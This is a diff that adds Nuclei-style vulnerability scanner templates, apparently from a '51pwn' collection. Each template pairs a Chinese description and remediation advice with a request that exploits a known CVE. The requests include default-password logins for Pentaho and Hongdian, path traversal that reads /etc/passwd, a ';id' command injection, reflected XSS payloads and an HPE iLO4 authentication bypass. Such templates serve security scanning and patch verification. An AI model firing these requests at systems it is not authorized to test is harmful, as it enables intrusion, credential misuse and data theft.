+- matchers: + - type: word + condition: and + part: body + words: + - + - Anonymous + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js' + - '{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Hitachi Vantara Pentaho/pentaho-default-login.yaml b/config/51pwn/yaml/Hitachi Vantara Pentaho/pentaho-default-login.yaml new file mode 100755 index 000000000..048f799c2 --- /dev/null +++ b/config/51pwn/yaml/Hitachi Vantara Pentaho/pentaho-default-login.yaml @@ -0,0 +1,43 @@ +id: pentaho-default-login +info: + name: Pentaho Default Login + author: + - l0ne1y + description: |- + Pentaho 弱口令漏洞 + Pentaho 是一个开源商务智能软件,以工作流为核心的,强调面向解决方案而非工具组件的,基于java平台的商业智能(Business Intelligence,BI)套件BI。 + + Pentaho 存在默认口令漏洞,默认口令为 admin/password, Admin/password。 + severity: high + remediation: |- + 修复方案: + 1、建议系统管理人员将已发现的弱口令立即改成强口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + part: header + words: + - pentaho/Home + - JSESSIONID= + - type: status + status: + - 302 + matchers-condition: and + raw: + - | + POST /pentaho/j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + j_username={{user}}&j_password={{pass}} + attack: pitchfork + payloads: + pass: + - password + user: + - admin diff --git a/config/51pwn/yaml/Homematic CCU3/CVE-2019-9726.yaml b/config/51pwn/yaml/Homematic CCU3/CVE-2019-9726.yaml new file mode 100755 index 000000000..3bd8e5a63 --- /dev/null +++ b/config/51pwn/yaml/Homematic CCU3/CVE-2019-9726.yaml @@ -0,0 +1,44 @@ +id: CVE-2019-9726 +info: + name: Homematic CCU3 - Directory Traversal / Arbitrary File Read + author: + - 0x_akoko + tags: + - cve + - cve2019 + - homematic + - lfi + description: |2- + Homematic CCU3 路径遍历漏洞 + 在eQ-3 AG Homematic CCU3 3.43.15和更早版本中读取目录遍历/任意文件使远程攻击者可以读取设备文件系统的任意文件。未经身份验证的攻击者可以访问Web界面来利用此漏洞。 + reference: + - https://atomic111.github.io/article/homematic-ccu3-fileread + - https://www.cvedetails.com/cve/cve-2019-9726 + severity: high + classification: + cve-id: + - cve-2019-9726 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:https://www.homematic.com/\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: regex + condition: or + part: body + regex: + - 'root:.*:0:0:' + - 'bin:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/.%00./.%00./etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Hongdian H8922/CVE-2021-28149.yaml b/config/51pwn/yaml/Hongdian H8922/CVE-2021-28149.yaml new file mode 100755 index 000000000..9a2dd90a8 --- /dev/null +++ b/config/51pwn/yaml/Hongdian H8922/CVE-2021-28149.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-28149 +info: + name: Hongdian Directory Traversal + author: + - l0ne1y + description: |- + Hongdian H8922 任意文件读取漏洞 + Hongdian H8922是深圳市宏电技术股份有限公司的一款路由器。 + + Hongdian H8922 3.0.5 devices存在路径遍历漏洞。该漏洞允许远程攻击者以最小的权限从设备下载任何文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://en.hongdian.com/Products/Details/H8922 + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/octet-stream + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - sshd:[x*] + - root:[$] + matchers-condition: and + raw: + - | + GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + - | + GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46YWRtaW4= diff --git a/config/51pwn/yaml/Hongdian H8922/CVE-2021-28150.yaml b/config/51pwn/yaml/Hongdian H8922/CVE-2021-28150.yaml new file mode 100755 index 000000000..4e0e6adc9 --- /dev/null +++ b/config/51pwn/yaml/Hongdian H8922/CVE-2021-28150.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-28150 +info: + name: Hongdian Sensitive Information + author: + - l0ne1y + description: |- + Hongdian H8922 敏感信息泄露 + Hongdian H8922是深圳市宏电技术股份有限公司的一款路由器。 + + Hongdian H8922 3.0.5 devices 存在安全漏洞,该漏洞允许非特权用户通过backup2.cgi读取cli.conf(带有管理员密码和其他敏感数据)。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://en.hongdian.com/Products/Details/H8922 + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、前后端同时对用户输入信息进行校验,双重验证机制。 + 4、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/octet-stream + - type: word + part: body + words: + - CLI configuration saved from vty + - service webadmin + matchers-condition: and + raw: + - | + GET /backup2.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + - | + GET /backup2.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46YWRtaW4= diff --git a/config/51pwn/yaml/Hongdian H8922/CVE-2021-28151.yaml b/config/51pwn/yaml/Hongdian H8922/CVE-2021-28151.yaml new file mode 100755 index 000000000..2ba612679 --- /dev/null +++ b/config/51pwn/yaml/Hongdian H8922/CVE-2021-28151.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-28151 +info: + name: Hongdian Command Injection + author: + - l0ne1y + description: |- + Hongdian H8922 操作系统命令注入漏洞 + Hongdian H8922是深圳市宏电技术股份有限公司的一款路由器。 + + Hongdian H8922 3.0.5 devices 存在操作系统命令注入漏洞,攻击者利用该漏洞可以通过用户名guest和密码guest进行访问。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://en.hongdian.com/Products/Details/H8922 + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + - type: word + condition: and + part: body + words: + - uid= + - gid= + - groups= + matchers-condition: and + raw: + - | + POST /tools.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Origin: {{BaseURL}} + Referer: {{BaseURL}}/tools.cgi + + op_type=ping&destination=%3Bid + - | + POST /tools.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46YWRtaW4= + Origin: {{BaseURL}} + Referer: {{BaseURL}}/tools.cgi + + op_type=ping&destination=%3Bid diff --git a/config/51pwn/yaml/Horde Framework/CVE-2005-3344.yaml b/config/51pwn/yaml/Horde Framework/CVE-2005-3344.yaml new file mode 100755 index 000000000..f7a99a2b2 --- /dev/null +++ b/config/51pwn/yaml/Horde Framework/CVE-2005-3344.yaml @@ -0,0 +1,27 @@ +id: CVE-2005-3344 +info: + name: Horde Groupware Unauthenticated Admin Access + author: + - l0ne1y + description: "Debian Horde默认管理员空密码漏洞 \nHorde 是个以PHP为基础的架构,用于创建网络应用程序。\n\nHorde 3.0.4的默认安装包含具有空白密码的管理帐户,这可让远程攻击者获得访问权。 " + severity: high + remediation: |- + 官方修复方案:升级至最新软件版本 + https://www.horde.org/ + 临时修复方案:
1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。
2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。
3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。
4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/)
5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + words: + - 'Horde :: User Administration' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/horde/admin/user.php' + - '{{BaseURL}}/admin/user.php' + method: GET + headers: + Content-Type: text/html diff --git a/config/51pwn/yaml/Horde Framework/CVE-2009-0932.yaml b/config/51pwn/yaml/Horde Framework/CVE-2009-0932.yaml new file mode 100755 index 000000000..15987ac61 --- /dev/null +++ b/config/51pwn/yaml/Horde Framework/CVE-2009-0932.yaml @@ -0,0 +1,29 @@ +id: CVE-2009-0932 +info: + name: Horde - Horde_Image::factory driver Argument LFI + author: + - l0ne1y + description: |- + Debian Horde Image.php本地文件包含漏洞 + + + Horde Framework是个以PHP为基础的架构,用来创建网络应用程式。 + + Horde没有正确地过滤对framework/Image/Image.php脚本所传送的输入便用于包含文件,远程攻击者可以通过在Horde_Image驱动名称中设置目录遍历序列导致包含和执行任意本地文件 + severity: medium + remediation: "官方修复方案:
\n 目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:\n\nhttp://lists.horde.org/archives/announce/2009/000486.html\n\nhttp://lists.horde.org/archives/announce/2009/000483.html\n\nhttp://lists.horde.org/archives/announce/2009/000482.html + \n\n临时修复方案:
1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断
2、过滤.(点)/(反斜杠)\\\\(反斜杠),编码绕过
3、禁止服务器远程文件包含
4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。
5、问号、井号、空格绕过(远程)" +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00' + method: GET diff --git "a/config/51pwn/yaml/HotelDruid\351\205\222\345\272\227\347\256\241\347\220\206\347\263\273\347\273\237/CVE-2019-8937.yaml" "b/config/51pwn/yaml/HotelDruid\351\205\222\345\272\227\347\256\241\347\220\206\347\263\273\347\273\237/CVE-2019-8937.yaml" new file mode 100755 index 000000000..424ae751f --- /dev/null +++ "b/config/51pwn/yaml/HotelDruid\351\205\222\345\272\227\347\256\241\347\220\206\347\263\273\347\273\237/CVE-2019-8937.yaml" @@ -0,0 +1,32 @@ +id: CVE-2019-8937 +info: + name: HotelDruid 2.3.0 - XSS + author: + - l0ne1y + description: |- + HotelDruid 跨站脚本漏洞 + HotelDruid是DigitalDruid.Net团队的一套九点管理系统。该系统包括客房管理、财务管理和库存管理等功能。 + + HotelDruid 2.3.0版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.hoteldruid.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - '"' + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git "a/config/51pwn/yaml/HotelDruid\351\205\222\345\272\227\347\256\241\347\220\206\347\263\273\347\273\237/CVE-2021-37833.yaml" "b/config/51pwn/yaml/HotelDruid\351\205\222\345\272\227\347\256\241\347\220\206\347\263\273\347\273\237/CVE-2021-37833.yaml" new file mode 100755 index 000000000..11a7efe86 --- /dev/null +++ "b/config/51pwn/yaml/HotelDruid\351\205\222\345\272\227\347\256\241\347\220\206\347\263\273\347\273\237/CVE-2021-37833.yaml" @@ -0,0 +1,39 @@ +id: CVE-2021-37833 +info: + name: Hotel Druid 3.0.2 XSS + author: + - l0ne1y + description: |- + HotelDruid 跨站脚本漏洞 + HotelDruid是DigitalDruid.Net团队的一套九点管理系统。该系统包括客房管理、财务管理和库存管理等功能。 + + HotelDruid中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.hoteldruid.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Hp Integrated_lights-Out_4/CVE-2017-12542.yaml b/config/51pwn/yaml/Hp Integrated_lights-Out_4/CVE-2017-12542.yaml new file mode 100755 index 000000000..4e569f48b --- /dev/null +++ b/config/51pwn/yaml/Hp Integrated_lights-Out_4/CVE-2017-12542.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-12542 +info: + name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass + author: + - l0ne1y + description: "HP Integrated Lights-Out 4 安全漏洞 \n HP Integrated Lights-Out 4(iLO + 4)是美国惠普(HP)公司的一个内嵌式服务器管理技术,它通过一个集成的远程管理端口,监视和维护服务器的运行状况、远程管控服务器等。\n\nHP iLO 4 + 2.53之前的版本中存在安全漏洞。攻击者可利用该漏洞绕过身份验证,执行代码。 " + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us + + 临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。
3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
4、采用成熟的权限管理框架,如spring security。
5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + part: body + words: + - iLO User + - type: word + part: header + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/rest/v1/AccountService/Accounts' + method: GET + headers: + Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA diff --git a/config/51pwn/yaml/IBM Lotus Domino WebMail/CVE-2005-2428.yaml b/config/51pwn/yaml/IBM Lotus Domino WebMail/CVE-2005-2428.yaml new file mode 100755 index 000000000..8e76fc62e --- /dev/null +++ b/config/51pwn/yaml/IBM Lotus Domino WebMail/CVE-2005-2428.yaml @@ -0,0 +1,28 @@ +id: CVE-2005-2428 +info: + name: Lotus Domino R5 and R6 WebMail - Information Disclosure + author: + - l0ne1y + description: "IBM Lotus Domino WebMail信息泄露漏洞\n IBM Lotus Domino WebMail是IBM消息传递解决方案组件,提供基本的基于浏览器的Lotus + Domino电子邮件访问。\n\nLotus Domino处理储存用户口令的过程存在问题,可能造成信息用户口令信息泄露。\n\n默认下Lotus Domino的主目录数据库names.nsf是所有用户都可读的,因此,所有用户都可以浏览人员项。在非特权用户浏览人员项时,\\\"Internet + Password\\\"字段是空的,表示用户不能浏览口令哈希。但是,如果编辑了Web页面的话(在Internet Explorer中\\\"查看源文件\\\"),\\\"HTTPPassword\\\"隐藏字段会包含有口令哈希。\n\n其他显示为空的字段也存在类似的问题。攻击者可以利用类似漏洞检索到的重要信息还有口令变更日期、客户端平台、客户端机器名称、客户端Lotus + Domino版本等。 " + severity: low + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + http://www.ers.ibm.com/ + 临时修复方案:
1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
2、将敏感信息进行加密存储,非必要不可发送前端
3、发送敏感信息时需加密传输,如有必要需脱敏处理
4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
令、会话标识jsessionid等), 防止敏感信息泄漏。
6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + name: domino-username + regex: + - (1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.icewarp.com/ + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd' + - '{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd' + method: GET diff --git a/config/51pwn/yaml/IceWarp Mail Server/CVE-2019-12593.yaml b/config/51pwn/yaml/IceWarp Mail Server/CVE-2019-12593.yaml new file mode 100755 index 000000000..ec4d8da8a --- /dev/null +++ b/config/51pwn/yaml/IceWarp Mail Server/CVE-2019-12593.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-12593 +info: + name: IceWarp <=10.4.4 - Local File Inclusion + author: + - l0ne1y + description: |- + IceWarp Mail Server 本地文件包含漏洞 + IceWarp Mail Server是美国IceWarp公司的一款邮件服务器产品。该产品支持电子邮件归档、SmartAttach附件、自动迁移等。 + + IceWarp Mail Server 10.4.4及之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置进行文件包含攻击,以导致执行代码时包含本地文件。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.icewarp.com/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: status + status: + - 200 + - type: word + words: + - '[intl]' + - root:x:0 + matchers-condition: and + path: + - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini' + - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd' + method: GET diff --git a/config/51pwn/yaml/IceWarp Mail Server/CVE-2020-27982.yaml b/config/51pwn/yaml/IceWarp Mail Server/CVE-2020-27982.yaml new file mode 100755 index 000000000..7357f9e83 --- /dev/null +++ b/config/51pwn/yaml/IceWarp Mail Server/CVE-2020-27982.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-27982 +info: + name: IceWarp WebMail Reflected XSS + author: + - l0ne1y + description: |- + IceWarp Mail Server 跨站脚本漏洞 + IceWarp Mail Server是美国IceWarp公司的一款邮件服务器产品。该产品支持电子邮件归档、SmartAttach附件、自动迁移等。 + + Icewarp WebMail 11.4.5.0 版本存在跨站脚本漏洞。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.icewarp.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E' + method: GET diff --git a/config/51pwn/yaml/IceWarp WebMail Server/CVE-2020-8512.yaml b/config/51pwn/yaml/IceWarp WebMail Server/CVE-2020-8512.yaml new file mode 100755 index 000000000..7766f606d --- /dev/null +++ b/config/51pwn/yaml/IceWarp WebMail Server/CVE-2020-8512.yaml @@ -0,0 +1,52 @@ +id: CVE-2020-8512 +info: + name: IceWarp WebMail XSS + author: + - pdteam + - dwisiswant0 + tags: + - cve + - cve2020 + - xss + - icewarp + description: |- + IceWarp WebMail Server 跨站脚本漏洞 + IceWarp WebMail Server是美国IceWarp公司的一款基于Web的邮件服务器产品。该产品支持电子邮件归档、SmartAttach附件、自动迁移等。 + + IceWarp Webmail Server 11.4.4.1及之前版本中的/webmail/的‘color’参数存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + reference: + - https://www.exploit-db.com/exploits/47988 + - https://twitter.com/sagaryadav8742/status/1275170967527006208 + - https://cxsecurity.com/issue/wlb-2020010205 + - https://packetstormsecurity.com/files/156103/icewarp-webmail-11.4.4.1-cross-site-scripting.html + severity: medium + classification: + cve-id: + - cve-2020-8512 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.icewarp.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22' + method: GET diff --git a/config/51pwn/yaml/ImpressCMS/CVE-2021-26598.yaml b/config/51pwn/yaml/ImpressCMS/CVE-2021-26598.yaml new file mode 100755 index 000000000..96820ebfc --- /dev/null +++ b/config/51pwn/yaml/ImpressCMS/CVE-2021-26598.yaml @@ -0,0 +1,75 @@ +id: CVE-2021-26598 +info: + name: ImpressCMS - Incorrect Authorization + author: + - gy741 + - pdteam + tags: + - cve + - cve2021 + - impresscms + - unauth + - cms + description: |- + ImpressCMS 授权问题漏洞 + ImpressCMS存在授权问题漏洞,该漏洞的存在是由于/include/findusers.php文件中的访问限制不正确。远程攻击者可以绕过实施的安全限制并获取有关应用程序用户的敏感信息。该漏洞允许远程攻击者未经授权访问其他受限功能 + reference: + - https://hackerone.com/reports/1081137 + - http://karmainsecurity.com/kis-2022-03 + - /~https://github.com/impresscms + - https://nvd.nist.gov/vuln/detail/cve-2021-26598 + severity: medium + metadata: + shodan-query: http.html:"ImpressCMS" + classification: + cve-id: + - cve-2021-26598 + cwe-id: + - cwe-287 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.impresscms.org + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 